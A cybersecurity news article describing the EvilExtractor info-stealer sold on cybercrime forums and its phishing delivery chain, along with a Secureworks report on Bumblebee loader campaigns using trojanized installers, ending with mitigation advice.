New All-in-One “EvilExtractor” Stealer For Windows Systems Surfaces On The Dark Web

New All-in-One “EvilExtractor” Stealer For Windows Systems Surfaces On The Dark Web

A new “all-in-one” stealer malware named EvilExtractor (also spelled Evil Extractor) is being marketed for sale for other threat actors to steal data and files from Windows systems.

“It includes several modules that all work via an FTP service,” Fortinet FortiGuard Labs researcher Cara Lin said. “It also contains environment checking and Anti-VM functions. Its primary purpose seems to be to steal browser data and information from compromised endpoints and then upload it to the attacker’s FTP server.”

The majority of the malware’s March 2023 victims were located in Europe and the United States, according to the network security firm. EvilExtractor was first released for use in the classroom, but it has since been co-opted by threat actors looking to steal sensitive data.

ALSO, READ British Hacker Charged for Operating “The Real Deal” Dark Web Marketplace

Beginning on October 22, 2022, an actor going by the name of Kodex began selling the attack kit on cybercrime forums like Cracked. Constantly updated, it includes a suite of modules that can steal metadata from the system, passwords and cookies from infected browsers, keystrokes, and even encrypt files as ransomware.

New All-in-One “EvilExtractor” Stealer For Windows Systems Surfaces On The Dark Web

The malware is also said to have been used as part of a phishing email campaign detected by the company on March 30, 2023. The emails lure recipients into launching an executable that masquerades as a PDF document under the pretext of confirming their “account details.”

The “Account_Info.exe” binary is an obfuscated Python program designed to launch a .NET loader that uses a Base64-encoded PowerShell script to launch EvilExtractor. The malware, besides gathering files, can also activate the webcam and capture screenshots.

“EvilExtractor is being used as a comprehensive info stealer with multiple malicious features, including ransomware,” Lin said. “Its PowerShell script can elude detection in a .NET loader or PyArmor. Within a very short time, its developer has updated several functions and increased its stability.”

ALSO, READ Trojanized Windows 10 Installer Used in Cyberattacks Against Ukrainian Government Entities

The findings come as Secureworks Counter Threat Unit (CTU) detailed a malvertising and SEO poisoning campaign used to deliver the Bumblebee malware loader via trojanized installers of legitimate software.

New All-in-One “EvilExtractor” Stealer For Windows Systems Surfaces On The Dark Web

Bumbleebee, documented first a year ago by Google’s Threat Analysis Group and Proofpoint, is a modular loader that’s primarily propagating through phishing techniques. It’s suspected to be developed by actors associated with the Conti ransomware operation as a replacement for BazarLoader.

Since Microsoft disabled macros in Internet-downloaded versions of Office, there has been an increase in the use of SEO poisoning and malicious advertisements to divert users searching for popular tools like ChatGPT, Cisco AnyConnect, Citrix Workspace, and Zoom to rogue websites hosting tainted installers.

ALSO, READ YouTube Videos Distributing Aurora Stealer Malware Via Highly Evasive Loader

Threat actors used Bumblebee malware to gain access and then laterally moved after three hours to spread Cobalt Strike and legal remote access software like AnyDesk and Dameware, according to a cybersecurity firm. Finally, the attack was stopped before the ransomware could complete its final step of infection.

“To mitigate this and similar threats, organizations should ensure that software installers and updates are only downloaded from known and trusted websites,” Secureworks said. “Users should not have privileges to install software and run scripts on their computers.”